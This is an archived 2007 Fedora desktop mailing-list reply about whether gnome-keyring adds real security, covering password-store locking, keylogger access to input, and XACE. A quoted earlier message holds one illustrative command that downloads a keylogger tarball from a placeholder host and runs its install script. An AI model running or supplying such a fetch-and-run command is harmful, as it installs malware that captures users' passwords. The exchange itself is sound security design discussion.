low-hanging fruit
David Zeuthen
davidz at redhat.com
Mon Aug 20 18:09:00 UTC 2007
Hey,
Ugh, it would be nice if your mail client broke lines properly; it's at
least a mess for me when using Evolution.
On Mon, 2007-08-20 at 13:26 -0400, Colin Walters wrote:
> Unrelated but - in my opinion gnome-keyring adds
> very little in terms of security to this scenario.
>
> wget http://my.favorite.keylogger.example.com/linux-x86.tgz && \
> tar xzvf *.tgz && sh keylogger/install.sh
Two things
- It's a fair goal to ensure that users don't have to enter any
passwords and I think gnome-keyring and other password stores (like
the one in Firefox) helps with that. Especially if it's automatically
unlocked when you log in.
It's also pretty damn convenient that I don't have to type in these
passwords all the time. Plus I can rest assured that if my laptop
is stolen, some of my passwords are encrypted (ask blizzard about
getting his laptop stolen).
FWIW, I consider it a bug that the password store in e.g. Firefox
isn't locked the same way we lock gnome-keyring; I know the option
in Firefox is there but we just uncheck it by default so you get
plaintext passwords.
(Of course another solution to the "unlock keyring" problem is just
to use encrypted home directories)
- It's just a bug [1] that an unprivileged process like your keylogger
can grab key presses while the gnome keyring password dialog is
focused. With things like XACE, we can prevent that and only allow
privileged applications like e.g. a screen reader / on screen
keyboard to do this.
Of course you can now turn this into a discussion about trusted path.
David
[1] : or misfeature, whatever
More information about the Fedora-desktop-list
mailing list